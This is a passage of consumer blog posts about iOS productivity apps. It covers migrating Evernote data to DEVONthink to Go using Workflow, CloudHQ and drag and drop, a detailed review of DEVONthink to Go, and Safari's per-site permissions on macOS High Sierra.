Notebooks still ends up there, but DEVONthink’s super power is search. It has passable editing and annotation tools, but I prefer doing the interactive work before it ends up in what is essentially a personal research database. For a lot of users Notebooks might even be enough. While the task management features were no doubt conceived for GTD nerds, they end up making Notebooks among the best note taking apps for college, or university users. The caveat being it’s not a handwriting app. In fact if anything holds it back, that would be it. I would get around that by using Nebo as a capture tool myself, they complement each other well. If DEVONthink’s not your jam, or you’re looking to replace Evernote with something private and local, Notebooks is a handsome and feature rich app. It has relative feature parity across macOS, and iOS, and a lot of unexpected touches. GTD purists could configure tickler files, and contexts until their head is sufficiently empty of all that arduous, excess thought. 1. It can even run its own local WebDAV server for private local sync. It sounds strange, but it’s really not. 1. I’m joking, you beautiful nerd you. ## iPad Hacks: Migrating Evernote Data on iOS A few days back I posted a fairly detailed introduction to DEVONthink to Go for iOS. To follow that up, I promised some options for iOS users wanting to leave Evernote, and bring their data with them. Whether you want to go all in with DEVONthink, or you have in mind another app, the question is how to migrate Evernote data to another iOS app. On macOS, you have a number of options. The most simple and clean being a direct transfer within DEVONthink Pro itself. Managing this process without a Mac, on the other hand, requires more creative thinking. What follows are some options for iOS only users wanting to export all Evernote data. DEVONthink is the endpoint in this case, but the process can easily be adapted for apps like Notebooks, Bear, or even Apple Notes. ### Some of the Gotchas I’ll admit I’m fortunate I could use a Mac to do this, but it’s not quite as difficult on iOS as it once was. Some advice out there will have you believe otherwise, but you can migrate your data without having to do it one note at a time. It is worth considering these potential stumbling blocks before you do it. I would pay special attention to the data you consider most important in Evernote, either tag it as such, or place it in a specific notebook. Reading on, you might also want to delimit different data types, such as text, PDFs, and images. The arrival of drag and drop had me wondering if we could simply drag the notes across to another app. I will come back to this below. You can bring drag and drop come into play, it just won’t solve the problem on its own. Unfortunately, it’s not as simple as dragging all your notes from one place to another. If you try to transfer directly from Evernote, these are some of the frustrations you will encounter: • Notes in Evernote are stored in a proprietary rich text format. If you try to drag notes, some apps like Apple Notes, will refuse the transfer when you try to drop them. Others, like DEVONthink, will allow you to drop the note, but will strip all the formatting. That might be fine for text only notes, but everything else is lost. The worst part is losing all your links. • If you try dragging a note with an attachment, you will get the title and nothing else. • If you can open the note and drag the attachment itself, it will come across no problem. Which is fine if you only want to drag a couple of items. I have hundreds of PDF attachments in Evernote. • When drag and drop doesn’t work, you might think you could use the share sheet. You’d be right, if you want to choose between exporting web links for notes, or sending each individual note via email in Apple Mail. • Evernote is mired to a functionality issue that, until recently, has bloodied the foreheads of iOS users. It doesn’t do multiple files. Yep, it’s painful. Which is why so many people hit these walls and keep the status quo. 1 Thankfully, we now have tools that can help overcome these problems. If you really want to migrate your Evernote data to another iOS app, you can. ### Using Workflow The Workflow route is straightforward enough. As alluded to above, depending on how precious you are about the data, it might require some preparation in Evernote. Whether you want to do this could come down to the number of notes you have, but discriminating by notebook or tag can help get better results. Tedious work on iOS, I know. You can always go nuts, and deal with the consequences later, whatever your destination. I’ll confess, that’s how I roll. I have played around with this for long enough to feel confident advising a uniform approach to importing notes, whether you choose to bring them across as text, or PDFs. Technically Workflow, and DEVONthink can both handle the rich media that Evernote stores. Setting up a complex workflow with IF conditionals is possible, but you can end up with a lot of wacky results in amongst the ones that transfer properly. Likewise, encoding the rich text itself via URL isn’t as consistent I’d like. Bear in mind, you’re not deleting the data in Evernote through this process. Even if you proceed after testing, and you’re still not happy with the results, you can try the other method below. 2 The best results I get via Workflow are from encoding all the data as a PDFs. That won’t suit everyone. Alternatively, you can do the same thing using Markdown, but any PDFs in Evernote won’t be encoded, they’ll come across blank. This is where that preparation comes in. If you have separated data types by tag, or notebook, you can run the different workflows individually. You can apply the same logic for images if you wish, although I haven’t set that up myself as I never stored any in Evernote. No doubt somebody is reading this thinking the workflows don’t need to be separated. That’s true, or at least it should be. As I mentioned earlier, my efforts at combining them turned out some garbage. If you’ve had more success, I would love to hear about it. Read on, and you will see the workflows can be combined more easily when taking a different route. Disclaimers The workflow will make you specify the number of notes you want to export/import. This is a limitation of the API, you have to specify a number. It’s a good idea to test this anyway, so set the number low to start with. These workflows also leave the ‘title’ parameter blank, as there seems to be a bug in one of the apps along the chain that interrupts the URL encoding — or decoding. 3 I will update the workflows when I’m certain the bug is squashed, but read on as there are better options below. You can adapt this workflow for you own needs, of course. If you want to know more about the DEVONthink URL scheme, the documentation is included with the app. Or you can get it here ### Instructions, or TL;DR Optional: Organise your Evernote data by data types using tags, or notebooks for Text and PDF 4. This is a giant pain, so before you go ahead and do it, make sure you have checked out the alternatives below. Either way, the process is as follows: • If you don’t want to distinguish the data types, just run the PDF workflow for everything to come across as PDFs. • If you have separated the data types, run each workflow separately. ### Using a Cloud Service with Workflow This route adds more complexity, but it gives you more flexibility as a result. There are some concessions with the form the data is transferred in, but that is true of all these methods. I have played around with a few different services, the main prerequisite being ease of use on iOS. A lot of web apps have awkward UI for touch control. Google cloud transfer for Evernote, and you will most likely find results dominated by MultCloud. I can’t recommend it for this job, to start it’s a poster candidate for shitty web UI for a touch interface. But, the real reason is MultCloud transfers without conversion, so you end up with a bunch of ENML documents. 5 Outside Evernote they’re all but useless. At best, MultCloud is a backup option. CloudHQ is also awful to look at, but it has much more granular options for the transfer, and the real kicker, it will actually work. You can use a free account with CloudHQ to export your notes in PDF, plain-text format, or both. It will export everything to Dropbox, or your pick of service. If anyone is wondering how this fits with my thoughts on cloud storage, data in Evernote is already insecure. This is about changing your ways. Once you have everything transferred, you will do the same thing as above. However, there is some good news. The DropBox API will expose a lot more information to workflow from the initial call, so it is easier to set conditions in the workflow to combine the actions. In other words, if you transfer the data to a storage service first, you can run a single workflow from there. ### Dropbox to DEVONthink Workflow This workflow is setup to import PDFs, and Plain text files. Migrate your data from Evernote to Dropbox via CloudHQ ### Drag and Drop for Best Results Drag and has made a lot of tasks on iOS much easier than ever before, with transferring data among them. With the help of the files, you can forget workflow altogether, and use drag and drop to manage the last part of the migration. The first step is the same as above, prepare and transfer your data from Evernote to cloud storage. You can do this with with Dropbox, or Box. I haven’t tested it with any other cloud services, so your mileage may vary elsewhere. If you’re using free plans, it’s worth knowing the box free plan gives your 10gb of storage – the maximum file size is 250mb, but that won’t be a problem here, in fact unless you are storing large video files it is unlikely to be a problem ever. 6 The key is how you set the apps up. You probably know by now that integration with the Files app can be hit and miss. This process exemplifies the difference between Files, and the more traditional Finder on macOS. You might expect you can open up Files and drag documents from one service to another, like you would between folders on macOS, but if that works it all it is very limited. For example, if you try to drag multiple files after selected them via the select function, you won’t be able to drop them anywhere. However, if you collect the files together by taping on them one at a time, then the files will stack together and you can drop them no problem. Then there is the matter of how folders must be setup to accept dragged items; the inbound folder accepting the files has to be added to the favourites section of the Files sidebar, to make it available as a drop destination. When you do get it to work with the files app exclusively, other strange things can happen. Like the metadata being out of whack. The point I’m making is the process is more complicated than it seems. Illustrative of how much room for improvement remains in the brave new world of iOS Files. But, this is only true if you are trying to manage the entire process in the Files app itself. The story is completely different if you you start in the Files app, and drop your notes in the third-party app itself. Instructions: • You can skip organising your Evernote data type for this method, it will make no difference • Use CloudHQ  to transfer data to Dropbox • Open up the files app. Select the notes your want to transfer, and dry them into the new app. ### Other Apps as a Destination Using DEVONthink as a destination, the results have been gapped doing things this way. The beauty of this method, however, is any app that accepts compatible data — and supports drag and drop — can be setup to receive the notes. She of the more popular note-taking apps on iOS will make the process even easier by providing an import function. Both GoodNotes, and Notability will let you import directly from cloud storage, without any further rigmarole. You can use drag and drop with both apps too, but you don’t need to. If you want to migrate data from Evernote to alternate notes apps, all you need to do is transfer it via the CloudHQ method above, then import the notes via the import function of the app in question. If the app is only using iCloud, you should still be able to use the Files app to mitigate that problem. If not, I have setup a quick and dirty workflow to transfer from Dropbox to iCloud, you can get it here 7 ### To-Do Evernote’s API offers potential for users migrating data. Like most folks, I’m a little light on time to do this sort of thing right now. I’m not making any promises, but I’m half thinking I will play around with both Workflow, and Pythonista over the holidays to see what can be done. 8 Anyone familiar with this site will also know how much I admire the Notebook app. It also has an excellent custom URL scheme. I intend to use it for setting up more workflows. Even though I have already transferred the bejesus out of data from Evernote, I will still mess around with these workflows some more. If you’re interested in how any of this this progresses, signup to the mailing list. Or, I will post it here at a later date. 1. I should point out here that my leaving Evernote had nothing to do with the price of a subscription. 2. I do think it gets better results 3. It’s most likely DEVONthink, the developers assure me it’s not happening in the next build 4. You can do images too, but you will have to adapt a Workflow for that 5. Evernote markup language 6. This is something that appears to confuse a lot of people. Box don’t do themselves any favours by wording it strangely either. The site says 250mb maximum upload. What it means is file size, not transfer limit. 7. If you just want to archive your Evernote data in iCloud, this will work for that too. 8. There are some existing scripts, but Evernote has moved to a new API. I haven’t yet found any in current working condition. Then again, I haven’t looked too closely yet. ## Advanced Data Management for iOS with DEVONthink This has been a while coming. 1 Having mentioned this app a number of times, I haven’t yet offered a detailed account — something it thoroughly deserves. Those mentions have prompted a reasonable question, is it worth buying DEVONthink to Go for iOS if you don’t have a Mac? The short answer is yes. Qualified by what you want to do with it, but you won’t be short on possibilities. Whether you’re looking for a private Evernote alternative, want to improve your digital file management, better organise research material, or you want secure storage and advanced search capabilities for your data. There is much that DEVONthink can do on iOS. Of course, that leads us to a much longer answer — and, believe it or not, this is a mere introduction. ### On Being Unique Most of the apps we use on iOS can be distinguished by category, or specific task. They’re often things we need, but as long as you have something in that category, capable of a specific job, the app itself comes down to personal preference. It’s true we’re not always spoilt for choice — and I’ll happily point out that some things are better than others. Nonetheless, if it’s a PDF reader, notes app, text editor, or email client, they’re all interchangeable to some degree. Whether you prefer GoodNotes to Notability, or PDF Expert to PDFpen, either will do the job. Until something better comes along, that is. 2 There is a different kind of app where interchangeability no longer applies. Or at least, where it’s not quite so simple. They’re few and far between, but there are some obvious examples. Take Drafts for iOS, sure it’s a text editor — and there are plenty of those — yet, that seemingly simple function belies a unique automation engine for text based productivity. Having popularised the x-callback-url system on iOS, Drafts is as much an inception as it is an app. 3 By all accounts, inter-app automation via URL was only half a hack until x-callback allowed apps to return the call — so to speak. The likes of 1Writer and Editorial can be loosely grouped with drafts. Like Drafts, 1Writer uses javascript automation, but more to bridge the gap from text editor to word processor. While Editorial is a high-spec graphical automation tool for manipulating text with Python. Then there is Pythonista. I can’t think of anything else like it. Not really. There are other code editors, but Pythonista can be invoked as an extension to perform scripted automation. Something that seemed at one time like it would never arrive on iOS. How Pythonista ever sneaked past moderation remains a mystery. Thankfully it did, and it remains a fixture of advanced automation on the iPad. Perhaps the most obvious example is Workflow. Apple swallowed it whole to make an entire subset of fan-geeks exhale a coordinated, and confused sigh. What will happen? The optimists are betting on some form of native integration with iOS, while the half-empty crowd are clasping their hands and pursing their lips for a round of tutting on podcasts. Jokes aside, if Apple ever took Workflow offline, they wouldn’t so much be shooting themselves in the foot as they would be cleaving the entire leg off the idea of an iPad as a serious working device. These are all unique, and important apps. Before I digress any further, I’m trying to provide some context for DEVONthink to Go. 4 Both to place it in good company, and to make the case for how unique it is. To view it as nothing more than a companion app for the macOS versions of DEVONthink would be a mistake. Sure, it can be used like that. As far as companions go, it’s a particularly powerful one. The iOS version, however, can stand on its own. It is something of a category in itself, given its crossover functionality. This is quite an achievement, especially as the app was completely re-written for version 2.0. 5 When used to its potential, DEVONthink can be just as important as the apps mentioned above on iOS. It’s easily as unique. But like anything, it comes down to how you intend to use it. Implementation is key. Getting the most from any of the DEVONthink apps means putting them at the centre of your workflow for capturing, storing, and retrieving data. DEVONthink to Go is no different. ### All in the Tags Amid the changes in iOS 11 were significant improvements for managing files. There is no doubt the Files app — even in these early stages — is a welcome and useful development. The caveat is recognising where some of Apple’s long held resistance to such an app came from. For example, organising files and folders — stacking iCloud with a folder hierarchy — is now easier than ever. Yet, to do so embraces an outdated method of organising data. Where research and study is concerned, how one archives important material is a serious consideration. This is not to say you shouldn’t use folders, but if you’re handling a lot of data, it can get very messy. This is where tags come in. A shallow file structure with carefully chosen tags adds depth to your metadata, giving you more surface area for search queries. Tagging gives you more hooks, but less visual confusion. Not only does the Files app allow more fine control for folders, users now have immediate access to Apple’s native tagging system. Whether carried over from macOS, or implemented locally on an iOS device, tagging can be utilised for search queries and data retrieval. Apple’s implementation of tagging across platforms has been casual at best. It’s kind to say it remains a work in progress. However, if only a gentle nod, it is still an acknowledgement of the utility in tagging for organising data. Ironically, if you find tagging useful and want to get more out of it, then you will need to go beyond the files app. This is just one area that DEVONthink shines. Tagging is part of the DEVONthink DNA. Some aspects of native iOS tagging remain mysterious, but DEVONthink is smart enough to import the metadata applied in the Files app. Unfortunately, it doesn’t yet work the other way around. ### A Secure Central Repository While organising a folder hierarchy in iCloud Drive is much easier with Files, ironically that app makes it less necessary to do so. I tend to work in the DEVONthink app directly, but DEVONthink data in Files is incredibly useful, and not just for quick access. This is something I mentioned in my post on cloud storage. Regardless of the storage provider, by storing data in DEVONthink you can couple the convenience of the Files app with strong client-side encryption. The previous post talks about syncing with macOS, but the same applies if you are only using iOS. The data is encrypted and decrypted on your device, making it secure during transfer, and at rest in the cloud. From that post, If you are already a user on macOS, adding DEVONthink to Go to your workflow is straightforward. The database itself is encrypted, and the app supports pretty much any file type you can throw at it. Devon Technologies are one of the oldest Apple software developers around. So it is no surprise to see them embracing the new Files App. This means DEVONthink to go can be used as a file provider. So you can store your files safely, and edit them in place using third-party apps. In my opinion, this is a pretty sound option. In many cases, it could be enough. If it is, managing files through DEVONthink will avoid the need for a dropbox alternative. DEVONthink is also very smart about storage, giving you the option to keep metadata locally, and download files on demand. Or if you prefer, you can store everything locally. As the engine is built to sync databases individually, there is even a little storage hack — if you are so inclined. Each database can synced using the same, or different cloud services. That means you can use the free tier of different services to save on the cost of storage. Admittedly the supported services are still limited, but if you are just starting they will be more than adequate. Perhaps more to the point, it also means you can sync multiple copies of databases, adding redundancy to your backups. This includes backing everything up to iCloud.6 Backing up data on iOS requires users to think differently, especially if you are not using a Mac or a PC as the mother ship. DEVONthink is one of few apps that can give you extra peace of mind. All but the most perfunctory writing requires research. Couple that to the focused nature of an iPad workflow, and you have a use case for a purpose built repository. Writers using Scrivener have tools built in to that app, but while they might be enough for some writers, that research is — in practical terms — silo’ed by project. I like to have that material available more generally, whether during, or after a project is complete. 7 Spotlight is a great tool for search, DEVONthink is better. DEVONthink is built for search. A consistent naming convention, and tags can only be helpful to maintaining a research database. DEVONthink comes preloaded with tools that will either compliment that process, or help you retrieve data regardless. With Boolean search operators, and parentheses, refining search terms will return items with more specificity. You will find more, and lose less. Search queries can be constructed using the boolean operators AND, OR, NOT, and the truly helpful NEAR. For example, I might remember that I saved an article that included the phrase ‘Why Aristotle was never quite as awesome as Plato’. I can search for the document with: NEAR (Aristotle Plato, 10), and DEVONthink will return items that have the keywords Aristotle and Plato within 10 words of each other. Of course, you can go much further by changing search queries together. My first example returns a lot of results, but let’s say I remember it was an informal source. I could construct a search query to eliminate results that have a keyword to indicate it comes from an academic journal. I would use something like NEAR (Aristotle Plato, 10) NOT Journal. I could use a DOI number, or Abstract as elements common to those kinds of results. Even if by trial and error, the ability to construct granular search queries makes DEVONthink to Go an invaluable tool. If you are a user of DEVONthink Pro on macOS, you should know the query syntax is a little different. It can be frustrating if you don’t know that, but the simplified version for iOS makes sense. While accurate searches are crucial, there is a swiftness involved with mobile input. The developers are on record as saying an alternative syntax is on the roadmap, to make the apps more consistent. The existing syntax would remain, which is a good thing to my mind. I have never had so much success at finding what I need among my haphazard collections. ### PDF Management I have consistently recommended PDF Expert for a stand-alone PDF reader on iOS. Until recently, together with the free Documents app from Readdle, and Papers 3 for iOS, that was the extent of my PDF workflow. It is not so clear cut anymore. For one thing, the makers of the PDF framework PSPDFkit released their free PDF Viewer app, making powerful PDF management available to users for nothing. But there are other reasons, one of them is DEVONthink to Go. Some advice I give out freely but struggle to keep is, try to minimise the apps you use for essentially the same task. Managing PDFs for your research can get out of hand if you don’t have a clear idea of how you organise them. There is no problem with using a third-party PDF app with DEVONthink to Go.The support for editing files in place means you can edit files in other apps, without having to copy them to another app. However, DEVONthink’s built in PDF editor is more than capable. It gets out of your way, includes excellent Apple Pencil support, and has all the requisite annotations tools. You can edit the documents themselves, even add pages if necessary. Sometimes you might need to do more with annotations, but that is about the extent of the limitations. These are considerations to make if you are assessing the in-app purchase. Especially if you are setting your iPad up for the first time, it could make a lot of sense to go all in and keep your document editing and annotations in one place. ### Note Taking The actual in-app note-taking features are quite sparse, but functionality of the app makes up for that in other ways. I have been making a point of laying out a use case where DEVONthink is a central hub for storing data, but it can be a point of creation too. DEVONthink to go supports rich text, plain text, and markdown, with the ability to capture, read, edit, or create within the app itself. The editor in the app itself is very basic, so I tend to use a third-party text editor. The ability to edit files in place means you can use whatever app you choose, as long as it supports file providers. In my experience to date, the app with the nicest integration is iA Writer, especially since the recent update. Another with reliable support is 1Writer. Editing in place means you are opening the file in your choice of editor, and the changes are reflected back in the database. Until recently, this wasn’t really possible. DEVONthink used a workaround it called ‘round trip’, which worked, but wasn’t ideal. Once the file is the database, the changes will be reflected whether you edit it in the third-party editor, or in DEVONthink itself. If you know anything about iOS system extensions, you will now that there are two types of actions in the share menu for files. One opens the file in another app, the other copies the file into the other apps storage. Edit in place means you are not making a copy. There have have been reports of strange behaviour, although I have only experienced it a couple of times myself. It seems to happen more when using the share extension, rather than starting the edit in the text editor first, and using the files integration. It is also worth pointing out that all of this functionality is new, as are the frameworks in iOS that support it. There are a few bugs in the system, but nothing catastrophic. This might appear to work back to front at first, but if you think of DEVONthink as the storage facility, it will sink in. Where it gets messy is if you try to edit the same file with multiple editors, you will end up with conflicts and error messages. My best advice is to be consistent. ### Replacing EverNote This is something that comes up a lot in relation to DEVONthink apps. Except for a couple of passing comments, there is conspicuous absence of Evernote coverage on this site. It’s not that I don’t think Evernote is useful. If anything were a gateway drug to digital productivity apps, Evernote is it. I was once a heavy user. The idea behind Evernote is to throw everything you ever come across at it, it can even be therapeutic for a digital pack rat who can’t let anything go. Clip it, and forget; or come back to if you will. If the defining Evernote feature is its clipper, that can be a problem, as there is nothing judicious about the process. Capturing information is ridiculously easy with Evernote. DEVONthink can operate on the same principle — if you wish — only completely private. The DEVONthink clipper might seem basic 8, but it is a powerful little extension. With the extensive automation feature on iOS, you can customise and extend its capabilities to suit your own needs. Unlike Evernote documents are not stored with DEVONthink in a proprietary format, so your data doesn’t feel so captive. If you’re a macOS user getting your notes out of Evernote is not difficult. 9 Yet, the more material you store there, the more reason you have to be nervous about the portability of that data. This is a double edged sword for Evernote and some users. The more you get drawn in, the harder it is to leave, and yet if you have a lot of important data there you’ll start to think about what might happen to it. I was concerned about securing the future of my own access to my data, but ultimately it was Evernote’s access to that data that provided the final push. What promoted me to jump was the increasingly creepy feeling I had about their privacy oscillations. Not long before all the hullabaloo about flip-flopping over their privacy policy , I was one of the users hit by a bug that deleted attachments from certain notes. I was among a group of users who received a year’s free premium subscription by way of apology. Ironically, the only thing I used Evernote for over the course of that year was to export my data. ### Moving out Truthfully, I hardly ever used Evernote to take notes. As I think many people do, I used it like a database. Moving that workflow to DEVONthink is very simple. Although, even if I still throw a lot at DEVONthink, I tend to do it with a little more foresight. That you can delineate types of data within a hierarchy that goes all the way to database level, means I don’t have the overwhelming sense that my research data is being polluted by gift ideas, and tutorials for obscure automations that I’ll probably never use. As for the data itself, I can still have the convenience of cloud storage, only now it’s encrypted and I can choose how, and what I want to synchronise. These things are just as true for an iOS only workflow as they are for a full blown DEVONthink Office pro user archiving their email. There remains a problem, however. As I alluded to above, getting your data out of Evernote, and into DEVONthink on the Mac is a trivial matter. DEVONthink makes it very simple, with Evernote API integration. Without a desktop of sone form in the middle, however, the same is not true for iOS users. The pressure points for going iPad only are now much fewer than ever, but there remain a couple. I often mention citations, then there is this kind of data transfer. There are workarounds for this. If you’re considering it, you’ll be happy to learn I have you covered. I was going to include the options, with different instructions and a couple of workflows I have built in this post, but I took a look at how long it is getting and broke it off into a seperate piece. It will go up not long after this. ### Automation Meets Drag and Drop Speaking of Workflow, an area of considerable value to an iOS only working life is automation. While the default iOS interaction model of one app at a time has been supplemented with multitasking features, the secondary, and even tertiary apps are almost exclusively invoked as part of a singular, focused task. 10 The benefit, whether intentional or not, is the iPad encourages a kind of focused work that more traditional computing interfaces do not. This is particular beneficial for academic work. This is a curious strength, but as anyone who has done a lot of work on an iPad will tell you, it has its drawbacks. Thankfully, most if not all insurmountable problems have been made history by two significant developments to the platform. The first was the aforementioned Workflow app. That app might be somewhat indebted to the inception of x-callback — as mentioned above — but Workflow kicked the automation door off its hinges, and you get the sense something much more significant is coming from that app. 11 The second development happened this year: drag and drop. It’s amusing to think the introduction of copy and paste to the iPhone was once an event. 12 Copying and pasting was for so long a cumbersome, finicky, and frustrating. With the APIs available to developers in iOS 11, we can now evaluate particular apps on the basis of how well they take-up native technologies, rather than what they can do to overcome a lack of the same. It might have been a stretch to call url-based automation native, but Apple has burred that distinction with Workflow. Regardless, DEVONthink To Go is tapped into both of those features — automation, plus drag and drop — extensively. Drag and drop is pretty self-explanatory, although the version we get with iOS 11 makes it feel like a completely new innovation. It’s deep integration, system wide even mitigates the need for some, albeit minor, automations. The kind of work one tends to do with DEVONthink, however, is ripe for automating. Something the developers are keenly aware of. The URL scheme in DEVONthink to Go allows a user to build very specific automations for every data type a database can hold. This includes, but is not limited to the following: • Create images • Create Bookmarks • Create documents, including Plain-text, Markdown, Rich Text, and HTML • Create Web Archives • Retrieve file contents, and/or metadata • Perform custom searches DEVONthink to Go will even perform service tasks via URL, such as indexing, syncing, and rebuilding caches, and you can change app settings. A lot these touches will be beyond most users needs, but it shows the meticulous level of detail that DEVON technologies drills into. More than that, these options provide troubleshooting options that may prove useful as databases become larger, and more devices are added to the chain. If you never use them, they offer security by way of both usefulness and insight into the forethought put to building the app. A it is intended for storing important information, all of this matters a great deal. ### In Summary To button this up, by returning to the question. Is DEVONthink to Go worth buying if you are an iOS only user? The answer remains, yes. Whether it is to act as a repository, a midway for automation, or to distill the need for multiple apps into one. There is a lot going on here. I’m not going to pretend it couldn’t be improved, but then DEVON technologies are nothing if not proactive in that regard. I’ll also admit that I get more from this, as I use DEVONthink on both macOS and iOS, but that doesn’t diminish its role on my iPad by any stretch. If it were to go away, I would have a serious nuisance on my hands to pick apart the various things it does. As I’ve been writing this, the capacity of DEVONthink for working on iPad has had me peeling back layers of functionality. At this point I’m aware of so many little things I have missed.This is especially true for Mac users, but that it should be obvious that was never the point of this post. At the moment I am experimenting with building more Workflows for DEVONthink to go, and that includes building on the options I have put together for referencing and citations. In the meantime, I have added a couple below that might be of interest. ### Workflows These workflows are experiments. I’m posting them here as examples of what you can do with automation and DEVONthink. They remain a work in progress. If you are inclined to improve upon them, I would love to hear about it. If you build your own, think about adding them to the Workflow Directory • DEVONwiki — DEVONthink’s internal linking structure remains consistent across platforms. This means you can use DT2GO for setting up a wiki style research library that will work across devices. This workflow uses a note in Drafts to reference PDF documents added to a DEVONthink database, either directly from the web, or from another storage location. With x-callback URL you can maintain the note itself in DEVONthink. I will post variations of this in future. • RSS to DEVONthink — As one of its many powers on macOS, DEVONthink can be used as an RSS aggregator and reader. The iOS version doesn’t have the same feature, but we can achieve a similar result with Workflow. 13 • Evernote Text to DEVONthink — I mentioned above, the trouble with getting your data from Evernote to DEVONthink on iOS without a desktop computer in the middle. This should be self-explanatory. Bear in mind it will only transfer text notes. I have a follow post in the works for a more thorough migration, You can pick up DEVONthink to Go on the App Store for US$21.99, with an in-app purchase case of$11.99 for the pro package 14 Until next time, enjoy. 1. Longer even, since I tried to stay off the internet as much as possible last week for fear of spoilers. Sadly, I’m not joking. 2. Or something new and shiny at least 3. Greg Pierce the developer wrote the spec for x-callback 4. Forgiving the name, that is. I can’t imagine why DEVONthink iOS wasn’t enough. 5. If you haven’t looked at it since version 1, this is a completely different app 6. The architecture is currently incompatible for DEVONthink’s version of selective sync, so iCloud Drive is only supported for backup at the moment. 7. I have the advantage of using a Mac here, I keep mot scrivener and DEVONthink research in sync with Hazel. Something I will post at a later date 8. The mobile version at least 9. For iOS see below 10. The exception here might be picture in picture, but you get the point 11. Or rather, the developers of that app. Now with Apple 12. Or testament to the breakneck speed of development since then 13. Note, depending on how the feed is setup you may need to make changes to this for the desired results 14. PDF annotations, and selective sync Categories iOS ## DEVONthink To Go updated for iPhone X, adds PDF and sheet editors This round of updates sees DEVONthink To Go  updated for iPhone X, adding PDF and sheet editors. I mentioned DEVONthink to go as a novel solution for better data security recently. While that alone is a good reason to put it to use, it drastically undersells the apps all round utility. DEVON Technologies summarise the app like so: DEVONthink To Go is DEVON technologies’ document and information management solution for iOS. Serving as repository for a large variety of data types it lets users keep their important documents with them at all times. It offers a rich set of organizing features as well as built-in viewers and editors for many file formats. Document provider and file provider extensions make documents available in other apps, and an encrypted synchronization keeps all data in sync with other iOS devices as well as with its Mac counterpart, DEVONthink, without compromizing the user’s privacy. Apart from the obligatory iPhone X support. This update includes further improvements to File App integration, smarter PDF interactions and markup, new document editing capabilities for table data., and refinements to database syncing. Effectively using DEVONthink apps is a huge topic, given what you can do with them. I have every intention of a deep dive on DEVONthink, when I can do it the justice it deserves. It is tidbits for the meantime. For users of DEVONthink on macOS, DEVONthink to Go is an ideal companion app. On its own merits, it is also an excellent self-contained solution for iPad first, or iOS only users. Now with drag and drop on iOS 11,  OCR integration with third-party apps like Scanbot is much easier. The excellent native x-callback-url support also makes DEVONthink to Go one of the best apps you will find for Workflow automation. All in all, you can set up a robust research system on iOS using DEVONthink. With, or without a Mac. ## iPad Diaries: Working with Drag and Drop – Bear and Gladys – MacStories Another link from MacStories. Now that the dust has settled on their annual iOS review, it is good to see a return to this more detailed, useful content. If you haven’t come across this regular series, iPad Diaries. Go back through some of the old posts, there are some great tips for working exclusively on the iPad. Some of them will be a little dated since iOS 11. But with all the little automations and workarounds to sift through, you are bound to find some good ideas for working smarter on that slab of glass. Be warned though, you might end up cycling through a lot of different apps. Students with a penchant for procrastination are particularly vulnerable. ## Workflow 1.7.7 Brings Drag and Drop Integration, iPhone X Support, and More iOS 11 Changes – MacStories As usual, MacStories has the full scoop on updates to Workflow. This is timely. I needed a prompt to write up some citation workflows for students I have been playing with. Writing any detail about the release itself is redundant. Viticci has that completely covered, The marquee addition of this release is full support for drag and drop in iOS 11, which is especially impressive on the iPad as it allows you to trigger actions based on content you drop into a workflow. In the original Workflow, if you wanted to feed external content (text, images, links, videos, etc.) to actions, you had to manually select an item from a native picker, use the iOS clipboard, or use Workflow’s action extension in other apps. The system worked well, but it was neither fast nor intuitive. ## macOS High Sierra: Safari’s iOS Style Permissions There was a time that Safari was a clunky, annoying browser that you could install on Windows.  To be fair, pretty much all browsers met that criteria at one time. Things change. In this week’s show and tell I included a link from The Verge, who are shipping Safari as the best reason to upgrade your Mac to High Sierra. So far it’s hard to argue with that. With features added to both iOS 11 and macOS, there is a lot to like about the development of Safari. Of particular interest is the new ability to control some of the internet’s more annoying tendencies with Safari’s iOS style permissions This is one of the areas that I have tried to balance security concerns with usability. I haven’t always felt comfortable with the results. For a time I used a tricked out install of Firefox, in accordance with one of my favourite privacy resources. The industry around tracking and data collection is so cunning that extensions can become a data point for tracking in themselves. This is one of many reasons the evolution of Safari has become so interesting, moving protection to within the webkit framework brings that balance a little closer. ### Safari’s iOS Style Permissions on macOS It is the new granular approach to permissions that I am most impressed with. Particularly on macOS. Safari itself now contains the kind of detailed permissions that we are used to applying on a per app basis for iOS. Something I find incredibly annoying — and invasive — is having websites try to send me push notifications. Who in their right mind would want their browser to badger them all day long? It’s more than just an annoyance, though. While some of the older security issues of Push have been incrementally addressed, by design they provide another means for tracking. Look closely and you will notice there is an irony in the way Apple is implicated in the origins of this. Thankfully, they are getting better at addressing these — perhaps unintended — consequences. Notifications are among the many things addressed in the new ability to control permissions for Safari. The upside of Push, it is a permission based protocol. So ultimately, it is one of the web’s annoyances that we can actually opt out of, and now without much trouble. It is not the only one. The influence of the mobile platform on macOS is becoming more and more obvious. The rollout of Continuity has no doubt made this inevitable, but we have seen more and more features make the crossover. From small, but important additions like Night Shift, to the way iOS devices have been the testing ground for significant new technologies. From a user standpoint, I feel the most significant, visible influence right now is the approach to permissions. The improved preference allow a user to block an entire category. Or you can manage them on a case by cade basis. Like iOS, you can manage access to the microphone and camera, access to location, and notifications. Then there are usability features, like the ability to turn on Reader mode by default for particular sites.  And, you can now put an end to those pesky auto-pay videos — you know who you are… Macworld. You can access all of these permissions in Safari’s preferences. Or, if you want to change settings on the fly, you can right-click — or ctrl + click — on a website’s name in the omnibar, and select Settings for this Website… ### Gaining Control The reality of the modern internet is it is a cesspit of shady behaviour by supposedly legitimate actors. Without even getting into the relevant arguments, the performance of websites is a case in itself for having control over the excess. I won’t lean into the rest of the story here, I can make my case another time. Suffice to say, there are good reasons to have some control over this. I will say that Apple’s interventions are doubly interesting, considering the industry built up around its fandom. Apple related sites are some of the worstoffenders too. My sense is there is much more nuance to this than you can glean from the exploding heads who are worried about their wallets. The argument that Apple is doing more to save advertising than harm it in these moves, should carry water with anyone thinking clearly. But Webkit more generally has ushered in significant, positive changes. Especially when it comes to performance. Webkit also provides significant advantages for the implementation of content Blockers. One of many reasons Safari is starting to back up some of it’s claims. ### Reasons to use Safari Browser on iOS iOS users have had good reason to keep an alternative browser around. I still keep iCab Mobile on hand, for all the little things it can do. It has always been like a browsing pocketknife. It really is the only genuinely extensible, standalone browser on iOS. 1 The built-in download manager retains its utility, even as we move into the brave new world of the iOS Files App. For as long as I have been an iOS user, anytime I hit a road block while browsing, I knocked it over with iCab. However, Safari is extensible insofar as iOS itself is extensible. As the operating system has improved, so too have the default apps. Like other native apps, it is the system wide hooks that make it so useful. 2 From handoff, to iCloud synced history, bookmarks and reading list. All of these features are available system wide. Where third-party developers have cottoned on to the beauty of app extensions, iOS has improved out of sight. With Apple taking possession of Workflow, this is only 